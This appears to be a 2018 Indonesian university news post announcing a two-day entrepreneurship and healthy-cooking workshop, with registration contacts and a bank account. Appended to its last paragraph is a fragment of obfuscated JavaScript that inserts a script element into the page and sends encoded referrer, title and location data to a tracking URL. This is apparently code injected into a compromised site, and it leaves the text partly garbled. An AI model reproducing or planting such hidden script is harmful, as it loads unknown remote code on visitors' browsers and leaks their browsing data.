H-1 Pelatihan Kewirausahaan (DIY) Dengan Konsep Course Dan Tema “Healthy Food”

Jurusan Manajemen FEB UB Bersama Penerbit Andi Yogyakarta Lakukan Workshop Mengenai Penulisan Buku
27 April 2018
Departemen Entreprenur & Networking HMJM FEB UB Mempersembahkan “DIY: Healthy Food for Better Life”
30 April 2018

Kewirausahaan merupakan salah satu proses dalam melakukan pekerjaan sesuatu yang baru dilakukannya atau kreatif yang sangat berbeda dengan yang lainnya, karena ini memberikan salah satu manfaat yang sangat lebih. Untuk menjadi kreatif dan memberikan manfaat yang lebih, maka perlu adanya pelatihan mengenai kewirausahaan itu sendiri. DIY (Do It Yourself) hadir untuk teman mahasiswa dalam mewujudkan menjadi entrepreneur yang seutuhnya. Lalu apa itu DIY ? DIY adalah program pelatihan terkait pengembangan dari minat dan kebutuhan pelatihan-pelatihan terkait kewirausahaan dengan konsep course dan melakukan pendampingan secara beberapa bulan dengan frekuensi beberapa pertemuan. Peserta dalam DIY ini juga akan melakukan praktek langsung terkait pelatihan yang diberikan nantinya.

 

 

DIY yang diadakan oleh Himpunan Mahasiswa Jurusan Manajemen (HMJM) bersama Jurusan Manajemen Fakultas Ekonomi dan Bisnis Universitas Brawijaya (JMFEB UB) ini mengusung tema “Healthy Food” yang nantinya juga akan ada latihan masak. Selain itu akan ada pemateri yang akan mendampingi jalannya acara pelatihan kewirausahaan ini ada dari Owner Lowcal dan Chef Lowcal.

 

 

Kegiatan DIY membuka untuk seluruh mahasiswa dan umum, dan kegiatannya sudah H-1 yaitu pelaksanaannya pada tanggal 28-29 April 2018 di Lowcal Kitchen and Salad (Jl. Terusan Dieng No.39). Jadi, buat temen temen mahasiswa yang berminat untuk ikut serta menjadi bagian dari DIY silahkan mendaftarkan diri melalui CP : Rana (087760493826) dan Vina (081578408990) atau langsung melewati pembayaran via ATM : Mandiri (900-00-4099268-8) atas nama Rana Athifah Achyar. Selain temen temen mahasiswa dan umum mendapat banyak pelatihan di acara ini, juga akan mendapat sertifikat, goodie bag, menu appetizer, main course & dessert, guide by professional chef, entrepreneur course, kemampuan memasak, dan more healthy life. 0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}